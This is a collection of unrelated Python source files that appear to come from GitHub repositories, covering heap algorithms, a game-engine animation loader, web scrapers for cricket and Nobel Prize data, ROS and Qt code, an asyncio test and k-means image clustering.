+{"seq_id":"35828646684","text":"from heapq import *\n\nclass SmallestKElements:\n\n\t@staticmethod\n\tdef smallestKElements(arr, k):\n\t\tmax_heap = []\n\t\t\n\t\tfor i in range(len(arr)):\n\t\t\theappush(max_heap, -arr[i])\n\t\t\tif(len(max_heap) == k + 1):\n\t\t\t\theappop(max_heap)\n\t\t\n\t\tans = []\n\t\t\n\t\twhile max_heap:\n\t\t\tans.append(-heappop(max_heap))\n\n\t\treturn ans\n\nif __name__ == '__main__':\n\tarr = [1, 4, 5, 3, 7, 8, 6, 10]\n\tk = 3\n\tans = SmallestKElements.smallestKElements(arr, k)\n\tfor a in ans:\n\t\tprint(a, end = \" \")","repo_name":"aakashverma1124/Interview-Preparation-Python","sub_path":"priorityqueue/SmallestKElements.py","file_name":"SmallestKElements.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"}
+{"seq_id":"10698316807","text":"from fife import fife\n# InvalidFormat is raised below on malformed XML, so import it alongside ET\nfrom fife.extensions.serializers import ET, InvalidFormat\n\ndef loadXMLAnimation(engine, filename):\n\tf = engine.getVFS().open(filename)\n\tf.thisown = 1\n\n\timgMgr = engine.getImageManager()\n\t\n\ttree = ET.parse(f)\n\tnode = tree.getroot()\n\n\tanimation = fife.Animation.createAnimation()\n\t\n\tcommon_frame_delay = int(node.get('delay', 0))\n\tx_offset = int(node.get('x_offset', 0))\n\ty_offset = int(node.get('y_offset', 0))\n\tanimation.setActionFrame(int(node.get('action', 0)))\n\n\tframes = node.findall('frame')\n\tif not frames:\n\t\traise InvalidFormat('animation without <frame>s')\n\n\tfor frame in frames:\n\t\tsource = frame.get('source')\n\t\tif not source:\n\t\t\traise InvalidFormat('animation without <source>s')\n\n\t\tframe_x_offset = int(frame.get('x_offset', x_offset))\n\t\tframe_y_offset = int(frame.get('y_offset', y_offset))\n\t\tframe_delay = int(frame.get('delay', common_frame_delay))\n\n\t\t# xml paths are relative to the directory of the file they're used in.\n\t\tpath = filename.split('/')\n\t\tpath.pop()\n\t\tpath.append(str(source))\n\n\t\timage_file = '/'.join(path)\n\n\t\timg = imgMgr.create(image_file)\n\t\timg.setXShift(frame_x_offset)\n\t\timg.setYShift(frame_y_offset)\n\t\t\n\t\tanimation.addFrame(img, frame_delay)\n\t\t\n#\t\tanimation.thisown = 0\n\treturn animation\n\n","repo_name":"karottenreibe/FIFE","sub_path":"engine/python/fife/extensions/serializers/xmlanimation.py","file_name":"xmlanimation.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"}
+{"seq_id":"13847572437","text":"from bs4 import BeautifulSoup\r\nfrom pathlib import Path\r\nimport requests\r\nimport 
re\r\nimport csv\r\n# Method to write into csvfile\r\ndef csv_write(row):\r\n csv_path = 'C:\\\\Users\\\\Soumya\\\\ipl_data_2018.csv'\r\n ipl_data_file = Path(csv_path)\r\n if ipl_data_file.is_file():\r\n with open(csv_path, 'a') as csvFile:\r\n writer = csv.writer(csvFile)\r\n writer.writerow(row)\r\n csvFile.close()\r\n else:\r\n with open(csv_path, 'w') as data_file:\r\n pass\r\n data_file.close()\r\n with open(csv_path, 'a') as csvFile:\r\n writer = csv.writer(csvFile)\r\n writer.writerow(row)\r\n csvFile.close()\r\nif __name__ == '__main__':\r\n url = [\"https://en.wikipedia.org/wiki/2008_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2009_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2010_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2011_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2012_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2013_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2014_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2015_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2016_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2017_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2018_Indian_Premier_League\"]\r\n # url = [\"https://en.wikipedia.org/wiki/2016_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2017_Indian_Premier_League\",\"https://en.wikipedia.org/wiki/2018_Indian_Premier_League\"]\r\n for i in range(0,len(url),1):\r\n r = requests.get(url[i])\r\n data = r.text\r\n soup = BeautifulSoup(data,'lxml')\r\n soup.prettify()\r\n # Initialization\r\n data = list()\r\n urls = list()\r\n rr_list = list()\r\n rr_overs = list()\r\n player_of_match =\"\"\r\n pom_team = \"\"\r\n umpire = \"\"\r\n reserve_umpire=\"\"\r\n match_data_holder = list()\r\n row = list()\r\n c=0\r\n Match_data = dict()\r\n # Writing Headers first\r\n if i == 0:\r\n row = ['Field_umpire1','Field_umpire2','TV_umpire','Reserve_umpire','Referee','Match','Team1','Team2','Team1_score','Team1_overs','Team1_RR','Team2_score','Team2_overs','Team2_RR','Venue','Schedule','Result','Player_of_match','Player_of_match_team','Toss','Season']\r\n csv_write(row)\r\n row.clear()\r\n # Fetching Scorecard from above url\r\n for links in soup.find_all('a',text='Scorecard'):\r\n c +=1 # Just a counter for no of matches in a season\r\n data = str(links).split(\" \") # Splitting the scorecard hyperlink, as we need the text under href tag\r\n urls = str(data[3]).split('\\\"') # The third part is our scorecard hyperlink for each matches in a season\r\n urlss = urls[1].replace(\"/game/\",\"/scorecard/\") # Replacing the url's game to scorecard, as wiki fetches the game\r\n if urlss.find(\"/398829\") < 0: # We don't want to include the warm up match played in SA between Rajasthan Royals and Cape Cobras\r\n open_site = requests.get(urlss) # We now open the webpage through hyperlink for scapping content\r\n site_data = open_site.text # we get all the data as form of text from the website\r\n soup_class = BeautifulSoup(site_data,'lxml') # we now use beautifulsoup function to parse on the text returned\r\n # We start to get the text from the tags \r\n for datum in soup_class.find_all('div',attrs={'class': 'cscore_info-overview','data-reactid':'20'}):\r\n # Here we are fetching the two teams for the current match\r\n for team1 in soup_class.find_all('span',attrs={'class': 'cscore_name cscore_name--long','data-reactid':'28'}):\r\n team1 = team1.text\r\n for team2 in soup_class.find_all('span',attrs={'class': 'cscore_name 
cscore_name--long','data-reactid':'37'}):\r\n team2 = team2.text\r\n # Getting result\r\n for result in soup_class.find_all('span',attrs={'class': 'cscore_notes_game'}):\r\n result = result.text\r\n # print (result)\r\n # Fetching Player of the match\r\n for pom in soup_class.find_all('a',attrs={'class': 'gp__cricket__player-match__player__detail__link','data-reactid':'53'}):\r\n if '&lpos=cricket:game:scorecard:player' in str(pom):\r\n # For older ipl seasons this works\r\n pom = str(pom).split(\"&lpos=cricket:game:scorecard:player\\\">\")\r\n else:\r\n # For recent season this works\r\n pom = str(pom).split(\"&lpos=cricket:game:game:player\\\">\")\r\n pom_player = str(pom[1]).split(\"\")\r\n player_of_match = pom_player[0]\r\n pom_team = str(pom_player[1]).split(\"\")[0]\r\n # Fetching team1 score. This team is the one who batted first.\r\n for find_team1_score in soup_class.find_all('div',attrs={'class': 'cscore_score','data-reactid':'31'}):\r\n team1_score = find_team1_score.text\r\n # Fetching team2 score. This team bats second.\r\n for find_team2_score in soup_class.find_all('div',attrs={'class': 'cscore_score','data-reactid':'40'}):\r\n team2_score = find_team2_score.text\r\n # Finding Field Umpires for the match\r\n for find_field_umpires in soup_class.find_all('h4',text='Umpires'):\r\n field_umpires = str(find_field_umpires).split('\\\"')[1]\r\n field_umpires = int(field_umpires)\r\n field_umpires += 1\r\n for single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(field_umpires)}):\r\n umpire = single_umpire.text\r\n umpire = umpire.split(\" \")\r\n # Getting the Umpire Names properly\r\n try:\r\n if len(umpire[0]) == 2:\r\n parts_0 = umpire[0].split()\r\n else:\r\n parts_0 = re.findall('[A-Z][^A-Z]*',umpire[0])\r\n # print (umpire[1])\r\n parts_1 = re.findall('[A-Z][^A-Z]*',umpire[1])\r\n if len(parts_0) == 2:\r\n # print ('Field Umpires - > {},{} {}'.format(parts_0[0],parts_0[1],umpire[1]))\r\n Match_data['Field_umpire1'] = str(parts_0[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_0[1]) +\" \"+str(umpire[1])\r\n row.append(Match_data['Field_umpire2'])\r\n elif len(parts_1) == 2 and len(umpire)>=3:\r\n # print ('Field Umpires - > {} {},{} {}'.format(umpire[0],parts_1[0],parts_1[1],umpire[2]))\r\n Match_data['Field_umpire1'] = str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])+\" \"+str(umpire[2])\r\n row.append(Match_data['Field_umpire2'])\r\n else:\r\n if (parts_1[1] == 'G'):\r\n parts_1[1] = str(parts_1[1]).replace(\"G\",\"GA Pratapkumar\")\r\n # print ('Field Umpires - > {} {},{}'.format(umpire[0],parts_1[0],parts_1[1]))\r\n Match_data['Field_umpire1'] =str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])\r\n row.append(Match_data['Field_umpire2'])\r\n else:\r\n # print ('Field Umpires - > {} {},{}'.format(umpire[0],parts_1[0],parts_1[1]))\r\n Match_data['Field_umpire1'] = str(umpire[0])+\" \"+str(parts_1[0])\r\n row.append(Match_data['Field_umpire1'])\r\n Match_data['Field_umpire2'] = str(parts_1[1])\r\n row.append(Match_data['Field_umpire2'])\r\n except(IndexError):\r\n # print ('Field Umpires Ex - > {} {},{}'.format(umpire[0],parts_0[0],parts_0[1]))\r\n raise \r\n # Finding TV Umpires\r\n for tv_umpire in soup_class.find_all('h4',text='TV Umpires'):\r\n tv_umpire = str(tv_umpire).split('\\\"')[1]\r\n tv_umpire = int(tv_umpire)\r\n 
tv_umpire += 1\r\n for tv_single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(tv_umpire)}):\r\n tv_umpire = tv_single_umpire.text\r\n Match_data['TV_umpire'] = tv_umpire\r\n row.append(Match_data['TV_umpire'] )\r\n if tv_umpire == '':\r\n row.append('')\r\n # Finding Reserve upmires\r\n for reserve_umpire in soup_class.find_all('h4',text='Reserve Umpire'):\r\n reserve_umpire = str(reserve_umpire).split('\\\"')[1]\r\n reserve_umpire = int(reserve_umpire)\r\n reserve_umpire += 1\r\n for reserve_single_umpire in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(reserve_umpire)}):\r\n reserve_umpire = reserve_single_umpire.text\r\n Match_data['Reserve_umpire'] = reserve_umpire\r\n row.append(Match_data['Reserve_umpire'])\r\n if reserve_umpire == '':\r\n row.append('') \r\n for referee in soup_class.find_all('h4',text='Match Referee'):\r\n referee = str(referee).split('\\\"')[1]\r\n referee = int(referee)\r\n referee += 1\r\n for match_referee in soup_class.find_all('div',attrs={'class':'match-detail--right','data-reactid':str(referee)}):\r\n referee = match_referee.text\r\n Match_data['Referee'] = referee\r\n row.append(Match_data['Referee'])\r\n if referee == '':\r\n row.append('')\r\n # Finding Overs and Run rate played by both teams\r\n if (result != 'Match abandoned without a ball bowled') :\r\n # print (\"inn\")\r\n for dat in soup_class.find_all('div', class_='cell'):\r\n # print (\"Inside Dat\")\r\n if dat.text == 'TOTAL':\r\n team1_ov = dat['data-reactid']\r\n # print (team1_ov)\r\n team1_ov = int(team1_ov)\r\n team1_ov += 1\r\n for get_overs in soup_class.find_all('div',attrs={'class':'cell','data-reactid':str(team1_ov)}):\r\n get_played_overs = get_overs.text\r\n split_comma = get_played_overs.split(\",\")\r\n rr_list.append(str(split_comma[1]).split(\")\")[0].split(\":\")[1].strip())\r\n rr_overs.append(str(split_comma[0]).split(\"(\")[1].split(\" \")[0].strip())\r\n else:\r\n rr_list = ['0','0']\r\n rr_overs = ['0.00','0.00']\r\n Match_data['Team1_score'] = \"0\"\r\n Match_data['Team2_score'] = \"0\"\r\n Match_data['Player_of_match'] = None\r\n Match_data['Player_of_match_team'] = None\r\n if (result != 'No result (abandoned with a toss)') :\r\n for dat in soup_class.find_all('div', class_='cell'):\r\n if dat.text == 'TOTAL':\r\n team1_ov = dat['data-reactid']\r\n team1_ov = int(team1_ov)\r\n team1_ov += 1\r\n for get_overs in soup_class.find_all('div',attrs={'class':'cell','data-reactid':str(team1_ov)}):\r\n get_played_overs = get_overs.text\r\n split_comma = get_played_overs.split(\",\")\r\n rr_list.append(str(split_comma[1]).split(\")\")[0].split(\":\")[1].strip())\r\n rr_overs.append(str(split_comma[0]).split(\"(\")[1].split(\" \")[0].strip())\r\n else:\r\n rr_list = ['0','0']\r\n rr_overs = ['0.00','0.00']\r\n Match_data['Team1_score'] = \"0\"\r\n Match_data['Team2_score'] = \"0\"\r\n Match_data['Player_of_match'] = ''\r\n Match_data['Player_of_match_team'] = ''\r\n # Finding Toss Report\r\n for toss in soup_class.find_all('h4',text='Toss'):\r\n toss_report = str(toss).split('\\\"')[1]\r\n toss_report = int(toss_report)\r\n toss_report += 2\r\n for toss_Match_data in soup_class.find_all('span',attrs={'data-reactid':str(toss_report)}):\r\n toss = toss_Match_data.text\r\n datum = str(datum.text)\r\n contents = datum.split(\",\")\r\n venue = str(contents[1])\r\n # Venue\r\n venue = venue.split(\" \")[5]\r\n # Match Date and type\r\n date = contents[2]\r\n # Getting Season \r\n season = 
str(contents[2]).split(\" \")[3]\r\n # Finding overs\r\n # Data Builder \r\n Match_data['Match'] = contents[0]\r\n row.append(Match_data['Match'])\r\n Match_data['Team1'] = team1\r\n row.append(Match_data['Team1'])\r\n Match_data['Team2'] = team2\r\n row.append(Match_data['Team2'])\r\n Match_data['Team1_score'] = team1_score\r\n row.append(Match_data['Team1_score'])\r\n Match_data['Team1_overs'] = rr_overs[0]\r\n row.append(Match_data['Team1_overs'])\r\n Match_data['Team1_RR'] = rr_list[0]\r\n row.append(Match_data['Team1_RR'])\r\n Match_data['Team2_score'] = team2_score.split(\" \")[0]\r\n row.append(Match_data['Team2_score'])\r\n Match_data['Team2_overs'] = rr_overs[1]\r\n row.append(Match_data['Team2_overs'])\r\n Match_data['Team2_RR'] = rr_list[1]\r\n row.append(Match_data['Team2_RR'])\r\n Match_data['Venue'] = venue\r\n row.append( Match_data['Venue'])\r\n Match_data['Schedule'] = date\r\n row.append(Match_data['Schedule'])\r\n Match_data['Result'] = result\r\n row.append(Match_data['Result'])\r\n Match_data['Player_of_match'] = player_of_match\r\n row.append(Match_data['Player_of_match'])\r\n Match_data['Player_of_match_team'] = pom_team\r\n row.append(Match_data['Player_of_match_team'])\r\n Match_data['Toss'] = toss\r\n row.append(Match_data['Toss'])\r\n Match_data['Season'] = season\r\n row.append(Match_data['Season'])\r\n # print(Match_data['Match'])\r\n # Writes to file\r\n csv_write(row)\r\n # Re-initialization for consecutive loop, to remove cached data\r\n row.clear()\r\n rr_list.clear()\r\n rr_overs.clear()\r\n player_of_match = \"\"\r\n pom_team = \"\"\r\n reserve_umpire=\"\"\r\n referee = \"\"\r\n tv_umpire = \"\"\r\n else:\r\n pass\r\nprint (c) # Total Matches of the season\r\n","repo_name":"soumyas2017/Webscapping","sub_path":"ipl_data_prepare.py","file_name":"ipl_data_prepare.py","file_ext":"py","file_size_in_byte":17489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16107699683","text":"import sys\nimport time\nimport signal\nimport rospy\nfrom robotiq_c_model_control.msg import CModel_robot_output as GripperCmd\nfrom robotiq_c_model_control.msg import CModel_robot_input as GripperStat\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\n\n\ndef main():\n\n rospy.init_node(\"publish_finger_state\")\n\n data = [0.]\n\n def update_gripper_stat(msg):\n data[0] = msg.gPO / 255.\n\n gripper_sub = rospy.Subscriber(\"/CModelRobotInput\", GripperStat, update_gripper_stat)\n joint_state_pub = rospy.Publisher(\"joint_states\", JointState, queue_size=10)\n rate = rospy.Rate(10) # 10hz\n\n while not rospy.is_shutdown():\n state_msg = JointState()\n state_msg.header = Header()\n state_msg.header.stamp = rospy.Time.now()\n state_msg.name = [\"robotiq_85_left_knuckle_joint\"]\n state_msg.position = [data[0]]\n state_msg.velocity = []\n state_msg.effort = []\n joint_state_pub.publish(state_msg)\n rate.sleep()\n\n gripper_sub.unregister()\n joint_state_pub.unregister()\n sys.exit(0)\n\n\nmain()\n","repo_name":"ondrejbiza/fewshot","sub_path":"launch/publish_finger_state.py","file_name":"publish_finger_state.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4002304339","text":"\r\nfrom PySide import QtGui\r\nfrom PySide import QtCore\r\nfrom PySide.QtCore import Qt\r\n\r\nfrom .propertyitemmodel import PropertyItemModel\r\nfrom .baseproxymodel import BaseProxyModel\r\nfrom .basecontextmenu import 
BaseContextMenu\r\nfrom .basetreeview import BaseTreeView\r\nfrom .baseselectionmodel import BaseSelectionModel\r\n\r\nclass BaseTreeWidget(QtGui.QWidget):\r\n\r\n treeViewClass = BaseTreeView\r\n itemModelClass = PropertyItemModel\r\n selectModelClass = BaseSelectionModel\r\n proxyModelClass = BaseProxyModel\r\n contextMenuClass = BaseContextMenu\r\n\r\n def __init__(self, parent=None, **kwargs):\r\n super(BaseTreeWidget, self).__init__(parent)\r\n\r\n self.horizontalLayout = QtGui.QHBoxLayout(self)\r\n self.horizontalLayout.setSpacing(2)\r\n self.horizontalLayout.setContentsMargins(0, 0, 0, 0)\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n\r\n splitter = QtGui.QSplitter(self)\r\n splitter.setOrientation(QtCore.Qt.Horizontal)\r\n splitter.setHandleWidth(3)\r\n splitter.setObjectName(\"splitter\")\r\n splitter.setChildrenCollapsible(True)\r\n\r\n treeView = self.__class__.treeViewClass(splitter)\r\n treeView.setObjectName(\"treeView\")\r\n treeView.header().setStretchLastSection(True)\r\n\r\n dataView = self.__class__.treeViewClass(splitter)\r\n dataView.setObjectName(\"dataView\")\r\n dataView.header().setStretchLastSection(False)\r\n dataView.noScrollTo = True\r\n\r\n self.horizontalLayout.addWidget(splitter)\r\n\r\n treeView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n treeView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n\r\n dataView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n dataView.setHorizontalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n dataView.setVerticalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n treeView.setVerticalScrollMode(QtGui.QAbstractItemView.ScrollPerPixel)\r\n\r\n treeVSB = treeView.verticalScrollBar()\r\n dataVSB = dataView.verticalScrollBar()\r\n\r\n treeVSB.valueChanged.connect(dataVSB.setValue)\r\n dataVSB.valueChanged.connect(treeVSB.setValue)\r\n\r\n treeView.collapsed.connect(dataView.collapse)\r\n treeView.expanded.connect(dataView.expand)\r\n\r\n treeView.collapsed.connect(treeView.recursiveCollapse)\r\n treeView.expanded.connect(treeView.recursiveExpand)\r\n\r\n# treeView.setStyleSheet(viewStyleSheet + branchStyleSheet + itemStyleSheet)\r\n# dataView.setStyleSheet(viewStyleSheet + itemStyleSheet)\r\n\r\n self.tableHScrollBar = dataView.horizontalScrollBar()\r\n\r\n #should be done once all widgets in the splitter have been created\r\n splitter.setStretchFactor(0, 0)\r\n splitter.setStretchFactor(1, 1)\r\n\r\n self.splitter = splitter\r\n self.treeView = treeView\r\n self.dataView = dataView\r\n\r\n def setupModelData(self, metamodel, **kwargs):\r\n\r\n bProxyModel = kwargs.pop(\"useProxyModel\", True)\r\n\r\n model = self.__class__.itemModelClass(metamodel, self)\r\n\r\n if bProxyModel:\r\n\r\n proxyModel = self.__class__.proxyModelClass()\r\n proxyModel.setSourceModel(model)\r\n self.setModel(proxyModel)\r\n\r\n self.treeView.sortByColumn(0, Qt.AscendingOrder)\r\n self.treeView.setSortingEnabled(True)\r\n\r\n else:\r\n self.setModel(model)\r\n\r\n self.dataView.mainCtxMenu = self.__class__.contextMenuClass(self.dataView)\r\n if self.treeView:\r\n self.treeView.mainCtxMenu = self.__class__.contextMenuClass(self.treeView)\r\n# self.connect(self.dataView.model(), SIGNAL(\"leafAdded(QModelIndex)\"), self.treeView.expand)\r\n# else:\r\n# self.connect(self.dataView.model(), SIGNAL(\"leafAdded(QModelIndex)\"), self.dataView.expand)\r\n\r\n return\r\n\r\n def setModel(self, model):\r\n\r\n self.dataView.setModel(model)\r\n self.dataView.setSelectionModel(self.__class__.selectModelClass(model))\r\n\r\n 
self.dataView.setColumnHidden(0, True)\r\n\r\n if self.treeView:\r\n\r\n self.treeView.setModel(model)\r\n self.treeView.setSelectionModel(self.dataView.selectionModel())\r\n\r\n for i in range(1, self.dataView.model().columnCount()):\r\n self.treeView.setColumnHidden(i, True)\r\n\r\n #self.dataView.header().setResizeMode(0, QtGui.QHeaderView.Fixed)\r\n #self.treeView.header().setResizeMode(0, QtGui.QHeaderView.Fixed)\r\n\r\n def model(self):\r\n return self.treeView.model()\r\n\r\n def selectionModel(self):\r\n return self.treeView.selectionModel()\r\n\r\n def getSelectedLeaves(self):\r\n return self.selectionModel().selectedLeaves\r\n\r\n def refresh(self):\r\n self.treeView.model().refresh()\r\n\r\n def wasAnItemPressed(self):\r\n\r\n ret = self.treeView.wasAnItemPressed()\r\n# print self, \"wasAnItemPressed\", ret\r\n return ret\r\n\r\n def updateTableHScrollRange(self, iMin , iMax):\r\n self.tableHScrollBar.setMinimum(self.dataView.columnWidth(0))\r\n\r\n\r\n def keyPressEvent(self, keyEvent):\r\n self.dataView.keyPressEvent(keyEvent)\r\n if self.treeView:\r\n self.treeView.keyPressEvent(keyEvent)\r\n\r\n def keyReleaseEvent(self, keyEvent):\r\n self.dataView.keyReleaseEvent(keyEvent)\r\n if self.treeView:\r\n self.treeView.keyReleaseEvent(keyEvent)\r\n\r\n\r\n def expandAll(self):\r\n self.dataView.expandAll()\r\n if self.treeView:\r\n self.treeView.expandAll()\r\n\r\n def resizeColumnsToContents(self):\r\n self.dataView.resizeColumnsToContents()\r\n if self.treeView:\r\n self.treeView.resizeColumnsToContents()\r\n\r\n\r\n def setUiCategory(self, categoryKey):\r\n\r\n model = self.model()\r\n\r\n sPropertyToDisplayList = model.getPrptiesFromUiCategory(categoryKey)\r\n\r\n dataView = self.dataView\r\n treeView = self.treeView\r\n\r\n for i, sProperty in enumerate(model.propertyNames):\r\n\r\n dataView.setColumnHidden(i, sProperty not in sPropertyToDisplayList)\r\n\r\n if i == 0 and treeView:\r\n treeView.resizeColumnToContents(i)\r\n else:\r\n dataView.resizeColumnToContents(i)\r\n\r\n def parentSelected(self):\r\n\r\n model = self.dataView.model()\r\n\r\n selectedLeaves = self.dataView.selectionModel().selectedLeaves[:]\r\n if model and selectedLeaves:\r\n model.moveLeaves(selectedLeaves[:-1], selectedLeaves[-1])\r\n\r\n def unparentSelected(self):\r\n\r\n model = self.dataView.model()\r\n\r\n selectedLeaves = self.dataView.selectionModel().selectedLeaves[:]\r\n if model and selectedLeaves:\r\n\r\n for leaf in selectedLeaves:\r\n\r\n parentLeaf = leaf.parent\r\n if parentLeaf:\r\n grdParentLeaf = parentLeaf.parent\r\n if grdParentLeaf:\r\n model.moveLeaves([leaf], grdParentLeaf)\r\n\r\n\r\n def __repr__(self):\r\n\r\n try:\r\n sRepr = ('{0}( \"{1}\" )'.format(self.__class__.__name__, self.objectName()))\r\n except:\r\n sRepr = self.__class__.__module__ + \".\" + self.__class__.__name__\r\n\r\n return sRepr\r\n","repo_name":"sebcourtois/cg-pypeline-toolkit","sub_path":"pytk/core/itemviews/basetreewidget.py","file_name":"basetreewidget.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5876602187","text":"\"\"\"Test For CountdownEvent\"\"\"\n\nimport asyncio\nimport pytest\nfrom countdown_event import CountdownEvent\n\n@pytest.mark.asyncio\nasync def test_smoke():\n \"\"\"Smoke test\"\"\"\n await asyncio.sleep(1)\n assert True\n\n countdown_event = CountdownEvent()\n\n async def mock_job(sleep_time: float) -> None:\n nonlocal countdown_event\n count = countdown_event.increment()\n 
print(f'incremented count to {count}')\n try:\n await asyncio.sleep(sleep_time)\n finally:\n count = countdown_event.decrement()\n print(f'decremented count to {count}')\n\n tasks = [asyncio.create_task(mock_job(5)) for _ in range(5)]\n tasks.append(countdown_event.wait())\n\n await asyncio.wait(tasks)\n assert countdown_event.count == 0\n print(\"done\")\n","repo_name":"rob-blackbourn/countdown-event","sub_path":"tests/test_countdown_event.py","file_name":"test_countdown_event.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42361029059","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import NobelWinnerItem\nimport re\nBASE_URL = 'https://ja.wikipedia.org'\n\nclass NwinnerListSpiderSpider(scrapy.Spider):\n name = 'nwinner_list_spider'\n allowed_domains = ['https://ja.wikipedia.org/wiki/']\n start_urls = ['https://ja.wikipedia.org/wiki/%E5%9B%BD%E5%88%A5%E3%81%AE%E3%83%8E%E3%83%BC%E3%83%99%E3%83%AB%E8%B3%9E%E5%8F%97%E8%B3%9E%E8%80%85']\n\n custom_settings = {\n 'ITEM_PIPELINES': {'nobel_winner.pipelines.DropNonPersons': 1,\n 'nobel_winner.pipelines.MongoDBPipeline': 2},\n 'MONGODB_SERVER': 'localhost',\n 'MONGODB_PORT': 27017,\n 'MONGODB_DB': 'nobel_prize',\n 'MONGODB_COLLECTION': 'winners'\n }\n def parse(self, response):\n h4s = response.xpath('//h4')\n for h4 in h4s:\n country = h4.xpath('span[@class=\"mw-headline\"]/text()').extract()\n if country:\n winners = h4.xpath('following-sibling::ol[1]')\n for w in winners.xpath('li'):\n\n wdata = process_winner_li(w, country[0])\n\n request = scrapy.Request(\n wdata['link'],\n callback=self.parse_bio,\n dont_filter=True\n )\n request.meta['item'] = NobelWinnerItem(**wdata)\n yield request\n\n def parse_bio(self, response):\n item = response.meta['item']\n href = response.xpath('//li[@id=\"t-wikibase\"]/a/@href').extract()\n\n if href:\n request = scrapy.Request(href[0],\n callback=self.parse_wikidata,\n dont_filter=True)\n request.meta['item'] = item\n yield request\n\n\n def parse_wikidata(self, response):\n item = response.meta['item']\n property_codes = [\n {'name': 'date_of_birth', 'code': 'P569'},\n {'name': 'date_of_death', 'code': 'P570'},\n {'name': 'place_of_birth', 'code': 'P19', 'link': True},\n {'name': 'place_of_death', 'code': 'P20', 'link': True},\n {'name': 'gender', 'code': 'P21', 'link': True},\n ]\n\n p_template = '//*[@id=\"{code}\"]//div[@class=\"wikibase-snakview-value wikibase-snakview-variation-valuesnak\"]{link_html}/text()'\n\n for prop in property_codes:\n\n link_html = ''\n if prop.get('link'):\n link_html = '/a'\n sel = response.xpath(p_template.format(code=prop['code'], link_html=link_html))\n if sel:\n item[prop['name']] = sel[0].extract()\n\n yield item\n\n\n\n\n\ndef process_winner_li(w, country=None):\n \"\"\"Process a winner's <li> tag\"\"\"\n wdata = {}\n wdata['link'] = BASE_URL + w.xpath('a/@href').extract()[0]\n text = ''.join(w.xpath('descendant-or-self::text()').extract())\n wdata['name'] = text.split('、')[0].strip()\n\n year = re.findall('\d{4}', text) # a 4-digit string is the year\n if year:\n wdata['year'] = int(year[0])\n else:\n wdata['year'] = 0\n print('no year')\n\n category = re.findall('文学賞|化学賞|物理学賞|生理学・医学賞|平和賞|経済学賞', text)\n if category:\n wdata['category'] = category[0]\n else:\n wdata['category'] = ''\n print('no category')\n\n if country:\n wdata['country'] = country\n wdata['born_in'] = ''\n\n wdata['text'] = text\n return wdata\n\n","repo_name":"watanta/python_javascriot_visualize","sub_path":"nobel_winner/nobel_winner/spiders/nwinner_list_spider.py","file_name":"nwinner_list_spider.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34649614221","text":"from sklearn.cluster import KMeans\nimport pickle\nimport os\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nenddir = os.path.dirname(__file__)[:-4]\npath = enddir+\"zad1/dataset validation\"\nx, y, z = (50, 50, 3)\nimage_array = pickle.load((open(path, \"rb\")))\ndataset = np.ndarray(shape=(len(image_array[\"dataset validation\"]), 7500), dtype=np.float64)\nn = 0\nfor image in image_array[\"dataset validation\"]:\n tmp = cv2.resize(image, (0, 0), fx=0.5, fy=0.5)\n dataset[n] = tmp.reshape(x*y*z)\n n = n + 1\n\n\nkmeans_cluster = KMeans(verbose=1)\n\nprint(dataset.shape)\n\nkmeans_cluster.fit(dataset)\ncluster_centers = kmeans_cluster.cluster_centers_\ncluster_labels = kmeans_cluster.labels_\nimage_cluster = cluster_centers.reshape(-1, 50, 50, 3)\n\nn = 0\nlabels = [[] for i in range(8)]\nfor label in cluster_labels:\n labels[label].append(image_array[\"labels validation\"][n])\n\n n += 1\n\nn = 0\nfor label in labels:\n print(str(n) + \" label contains these fruits: \" + str(np.unique(label)))\n n += 1\n\nn = 241\nfor img in image_cluster:\n tmp = img.astype(np.float32)\n img = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n plt.subplot(n), plt.imshow(img), plt.title(\"Class: \" + str(n-241))\n if n < 249:\n n = n + 